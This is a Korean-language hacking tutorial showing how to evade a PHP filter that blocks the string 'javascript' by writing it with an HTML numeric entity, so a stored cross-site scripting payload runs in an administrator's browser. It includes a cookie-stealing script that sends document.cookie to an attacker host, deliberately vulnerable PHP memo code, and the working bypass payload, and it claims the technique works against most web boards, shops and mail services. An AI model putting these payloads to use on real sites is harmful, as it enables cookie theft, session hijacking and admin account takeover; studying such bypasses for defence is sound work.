Evading the Algorithm Prohibiting the Use of Specific Strings in CGI
(CGI 에서 특정 문자열을 사용 금지한 알고리즘 우회하기)

1. 개요

근래에 많은 CGI 프로그램들은 해커의 Cookie Sniffing 공격을 막기 위해 사용자가 Javascript 같은 Client Script Language 의 사용을 제한하는 방법을 많이 구현해 왔습니다. Javascript 나 Vbscript 같은 언어의 사용을 금지시킴으로써 해커는 Cookie Sniffing 에 악용될 수 있는 Script들을 사용하기가 쉽지 않았습니다. 그렇지만 항상 그래왔듯이, 방어 알고리즘은 깨는 방법도 나오기 마련입니다. 이 문서에서는 해커의 Client Script 사용을 제한하는 CGI 환경에서 제한을 우회하여 Client Script 를 사용하는 방법에 대해서 다루고 있습니다.

일반적으로 CGI 프로그램의 보안 알고리즘에서는 해커의 Cookie Sniffing 공격을 막기 위해 "script" 혹은, "javascript" 같은 특정 문자열의 사용을 제한합니다. 이러한 제한으로 해커는 Client Script Language를 사용하기가 어렵습니다. CGI 프로그램에서의 이러한 필터링 작업 때문에 해커는 Cookie Sniffing 을 성공하기 힘듭니다.

이 문서에서는 Unicode 를 이용하여 이러한 제한을 우회하는 방법에 대해서 설명할 것입니다. Unicode 는 텍스트나 스크립트 문자에 대한 바이너리 코드를 확립하기 위해서 만들어졌습니다. 이 것을 이용하면 해커는 Cookie Sniffing 공격을 성공 할 수 있습니다.

2. 이용될 수 있는 곳

이 문서에서 다루는 방법을 이용하면, 해커는 특정 문자열을 제한하는 CGI 프로그램에서 원하는 문자열을 사용할 수 있게 됨으로써, Cookie Sniffing 공격을 성공할 수 있습니다. Cookie Sniffing 에 성공하게 되면, 해커는 2 차적인 공격이라 볼 수 있는 Cookie Spoofing 공격을 수행함으로써, Target Server 의 Account 나, 기타 Admin 이 할 수 있는 특정 기능을 불법적으로 수행할 수 있습니다.

Target CGI 프로그램은, 게시판, 자료실, 쇼핑몰, 메일서비스 등등 거의 모든 CGI 을 Target 으로 삼고 공격할 수 있습니다. 그리고 아직 이 공격 기법은 많이 알려지지 않은 기법이므로 Cookie Sniffing 을 막기 위해서 조치를 취한 CGI 프로그램에서 대부분 활용될 수 있을거라 생각됩니다.

3. 기술적인 내용

기술적인 내용을 알아보겠습니다. 먼저, 어떤 방식으로 해커의 Cookie Sniffing 공격을 막는지 조금 더 자세하게 알아보겠습니다. 예를 들어서 해커가 Cookie Sniffing 을 하기 위해서 필요한 특정 문자열이 "javascript" 라고 가정하겠습니다. (Cookie Sniffing 공격을 할 때, 꼭 javascript 문자열을 이용해서만 할 수 있는 것은 아니며 여러 다른 방법들도 존재합니다.)

Hacker 가 Cookie Sniffing 을 할 때 사용하는 Script 가 다음과 같다고 가정하겠습니다.

cook-sniff.html

<html>
<head>
<title>beist's Cookie Sniffing</title>

<script language=javascript>
window.open("http://beist.hackerscomputer/hack.php?cook="+document.cookie+"&url="+location.href);
</script>

</head>
<body>

test.

</body>
</html>

위 cook-sniff.html 에서, "<script language=javascript>" 라는 부분을 보시면 javascript 문자열이 사용되었습니다. 임의의 CGI 를 만들고, 어떤 방식으로 javascript 의 사용을 제한하는지 알아보겠습니다.

test.html

<html>
<head>
<title>filtering evasion</title>
</head>
<body>
<br><br><br>
<center>
<form action=java_test.html method=post>
<font size=2>Input text : <input type=text name=hacker> <input type=submit>
</form>
</body>
</html>

test.html 에서 사용자가 데이터를 입력했을 때, 데이터가 넘어가는 CGI 프로그램인 java_test.html 의 소스는 다음과 같습니다.

java_test.html

<?

echo "
<html>
<head>
<title>filtering evasion test</title>
</head>
<body>
<center>
<br><br><br>
<font size=2>
";

echo "Original string : $hacker<br><br>";

$hacker = eregi_replace("javascript", "xjava-script", $hacker);

echo "Filtering string : $hacker";

?>

java_test.html 는, PHP 의 eregi_replace 함수를 사용하여 사용자가 입력한 $hacker 의 값에, javascript 가 있다면, 이 값을 xjava-script 로 바꾸어 줍니다.

test.html 에서 "script language=javascript" 를 입력하면 java_test 은 어떤 값을 출력해주는지 확인하는 테스트 해보겠습니다.

[화면1] test.html (script language=javascript 입력)

다음은 결과입니다.

[화면2] java_test.html

사용자가 입력한 "javascript" 문자열이, java_test.html 의 eregi_replace() 함수에 의해 "xjava-script" 로 바뀌어진 것을 확인할 수 있습니다. 만약 "<script language=javascript>" 가, "<script language=xjava-script>"로 바뀌게 된다면, Web 브라우져는 해커가 입력한 Script 를 정상적인 Javascript 로 인식하지 못해, window.open() 메소드 등과 같은 Javascript 문법이 아예 동작하지 못하기 때문에 Cookie Sniffing 공격을 할 수가 없습니다.

CGI 는 이러한 방법으로 특정 문자열을 필터링함으로써 해커의 Cookie Sniffing 공격을 방지하고 있습니다. 여기서는 임의의 CGI 프로그램을 하나 작성한 다음, 이것을 타겟으로 잡고 유니코드를 이용하여 CGI 의 Javascript 사용 금지 필터링을 우회하고 Cookie Sniffing 에 성공하는 방법에 대해서 알아보겠습니다.

그전에, Unicode 에 대한 지식을 몇가지 알아보겠습니다. Unicode 는 국제 표준 기구의 문자 세트 관련 표준 규격을 말합니다. Unicode 는 국가 간의 전산 자료 교환의 필요서에 의해서 탄생하였습니다. 각 나라마다 다른 언어를 컴퓨터에서 다루려고 하다보니 여러 가지 문제점이 나타났습니다. 이 문제점을 위해서 국제 표준으로 만들어진 것이 Unicode 라는 것입니다.

즉, 각 문자마다 고유의 Unicode 넘버가 부여되는데, 해커는 이 Unicode 를 이용하여 위에서 CGI가 사용했던 필터링을 우회할 수 있습니다. 유니코드에서는, 예를 들어 a 문자열이 갖는 Unicode 값은 0061 입니다. 이 것은 웹 브라우져에서 &#x0061; 와 같은 형식으로 표현될 수 있습니다.

sample.html

<html>
<head>
<title>sample unicode</title>
</head>
<body>
<center><br><br><font size=2>
a = (unicode) &#x0061;
</body>
</html>

sample.html 을 웹브라우져로 읽어보겠습니다.

[화면3] sample.html (sample unicode)

sample.html 을 웹으로 읽은 결과, &#x0061; 유니코드 값이, 웹 브라우져에서는 해석되어 a 로 표시된 것을 알 수 있습니다. 이런 방법으로 해커는 "a" 문자가 아닌, "&#x0061;" 유니코드 값으로도 a 를 표현할 수 있습니다.

짐작하셨겠지만, 0061 의 61 은 a 의 hex code 입니다. 기존의 ASCII 코드 값들은 유니코드에서도 같은 범위에 위치하고 있습니다. 다른 문자들의 유니코드 값을 샘플로 몇개 더 알아보겠습니다.

0061 = a
0062 = b
0063 = c
.....

0041 = A
0042 = B
0043 = C
.....

0021 = !
0022 = "
0023 = #
.....

0031 = 1
0032 = 2
0033 = 3
.....

이제, 사용자의 Client Script 사용을 제한하는 CGI 를 제작하고, 이 것의 필터링을 우회하여 Cookie Sniffing 에 성공하는 과정을 알아보겠습니다. Admin 에게 메모를 보낼 수 있는 기능의 CGI 라고 가정하겠습니다. 다음은 Memo 를 보낼 수 있는 Form 입니다.

write.html

<html>
<head>
<title>memo to admin</title>
</head>
<body>
<center><br><br>
<font size=2>
<table>
<form action=write_ok.html method=post>
<td><font size=2>Name : </td><td><input type=text name=name></td><tr>
<td><font size=2>Subject : </td><td><input type=text name=subject></td><tr>
<td><font size=2>Memo : </td><td><textarea name=memo cols=60 rows=10></textarea>
</td><tr>
<td></td><td><input type=submit></td><tr>
</table>
</body>
</html>

다음 write_ok.html 파일은, write.html 에서 사용자가 보내온 데이터를 처리해줍니다. 사용자가 입력한 데이터는 memo.txt 에 저장되고, Admin 은 memo.txt 를 읽어봄으로써 사용자가 보내온 메모를 확인할 수 있습니다.

write_ok.html

<?

$name=str_replace("<", "&lt;", $name);

$subject=str_replace("<", "&lt;", $subject);

$memo=eregi_replace("javascript", "xjava-script", $memo);

$memo = nl2br($memo);

if(!file_exists("./memo.txt"))
{
$fp=fopen("memo.txt", "w");
fputs($fp, "
<html>
<head>
<title>Memo</title>
</head>
<body>
");
fclose($fp);
}

$fp=fopen("./memo.txt", "a++");

fputs($fp, "
------------------------------------------------------------------------<br>
Name : $name<br>
Subject : $subject<br>
Memo : <br>
<br>
$memo<br>
------------------------------------------------------------------------<br><br>
");

fclose($fp);

echo "ok..";

?>

이름과 제목 부분에서 태그 사용을 원천 봉쇄하기 위해 < 를 &lt; 로 바꾸었습니다. 그리고 memo 에서는 태그는 허용하지만 javascript 를 사용하지 못하게 하기 위해, javascript 를 xjava-script 라는 문자열로 변환하는 방법을 사용하였습니다. write.html 에서 다음과 같이 입력하였을 경우, memo.txt 에 어떻게 저장되는지 확인해보겠습니다.

[화면4] write.html 입력

memo.txt 를 확인해보겠습니다.

memo.txt

------------------------------------------------------------------------<br>
Name : &lt;b>hi..&lt;/b><br>
Subject : &lt;i>test&lt;/i><br>
Memo : <br>
<br>
<script language=xjava-script>alert(location.href);</script><br>
------------------------------------------------------------------------<br><br>

/* alert(location.href); 는, 현재 페이지의 주소 값을 alert 창을 통해서 출력해주는 기능을 합니다. 여기서는 단순히 필터링 우회 테스트를 위해서 사용된 것입니다. */

< 는 &lt; 로 바뀌었고, javascript 는 xjava-script 로 바뀌었습니다. javascript 가 xjava-script 로 바뀌었기 때문에 javascript 는 작동되지 않을 것이고, Cookie Sniffing 공격은 실패할 것입니다.

이 문서에서는 write_ok.html 의 필터링을 극복하기 위한 방법으로 유니코드를 이용한 방법을 소개할 것입니다. 유니코드에 대한 소개는 위에서 간단하게 알아보았고, 이제 실제로 공격하는 방법을 소개하겠습니다.

위에서 문자 a 의 유니코드 값은 &#x0061; 이라고 설명하였습니다. write_ok.html 는 "javascript" 문자열을 필터링하므로, 우리는 유니코드로 javascript 문자열을 다른 방법으로 표현할 것입니다.

javascript = jav&#x0061;script

위의 jav&#x0061;script 는 javascript 문자열과 같습니다. 이 것을 이용하여 다시 한번 글을 써보겠습니다.

[화면5] write.html (유니코드 이용하여 javascript 사용하기)

사용자가 입력한 데이터가 어떻게 되었는지 memo.txt 를 확인해보겠습니다.

memo.txt

------------------------------------------------------------------------<br>
Name : beist<br>
Subject : Java Test<br>
Memo : <br>
<br>
<script language=jav&#x0061;script>alert(location.href);</script><br>
------------------------------------------------------------------------<br><br>

사용자가 입력한 <script language=jav&#x0061;script>alert(location.href);</script> 부분은 아무런 이상없이 memo.txt 에 저장되었습니다. Admin 이 Memo 를 확인하려 memo.txt 를 읽었다고 가정하고 화면을 보겠습니다.

[화면6] memo.txt (Admin 이 Memo 확인)

사용자가 입력한 javascript 가 성공적으로 삽입되었음을 확인할 수 있습니다. Admin 의 웹 브라우져에서는 location.href 의 값을 alert 창을 통해 출력하고 있습니다. 해커는 이러한 방법을 응용하여 CGI 의 Javascript 필터링을 우회하고, Cookie Sniffing 에 성공할 수 있을 것입니다.

4. 마치는 말

유니코드를 이용하여 CGI 의 Javascript 필터링을 우회하는 방법에 대해서 알아보았습니다. 이런 방법처럼, 유니코드라는 확장 영역을 이용하면 현재 거의 모든 CGI 의 필터링을 우회할 수 있습니다. 이 것을 막기 위한 방법을 연구해야할 것입니다.

이 것을 막는 방법으로, < 문자열의 사용을 제한함으로써, 모든 태그의 사용을 근본적으로 막는 방법이 있지만, 이렇게 될 경우, 사용자의 영역을 너무 제한하는 것이므로 신중히 고려해야할 사항입니다. 또한 < 문자의 사용을 제한한다고 모든 것이 해결되는 것은 아닙니다. 유니코드를 이용한 방법 이외에도 Cookie Sniffing 방지 알고리즘을 우회하는 방법은 많이 있습니다. 해커는 HTML 의 특성을 이용하여 방어 알고리즘을 쉽게 우회할 수 있으며, 해커의 공격을 완벽하게 막을 수 있는 CGI 는 찾아보기가 힘듭니다. (ex>, onload, onclick 등의 function 사용)

에피소드. 이 기술은 제가 어떤 해커의 공격을 받고, 분석을 통해 알게 된 기술입니다. 저의 E-mail 주소는 공개되어 있는데, 꽤 많은 해커분들이 저의 E-mail 을 해킹하기 위해서 공격 시도를 합니다. 이 기술은 그 해커들 중 한 분이 구사한 기술로, 저에게 새로운 기술을 알게해 준 고마운 해커입니다.(메일을 view-source:로 읽어서 다행히 공격은 성공하지 못했습니다.) 저를 공격할 때 익명으로 위조된 정보를 이용하여 공격을 하시는데, 그러지 않으셔도 괜찮습니다. 저는 제가 해킹 당하여도 고소하지 않을 것입니다. 저는 실력이 갖추어진 해커와 해킹 기술을 이야기 하는 것을 좋아하기 때문입니다. 해킹 기술에 관한 이야기나 토론은 언제든지 환영합니다. (크래커는 환영하지 않습니다. ^^)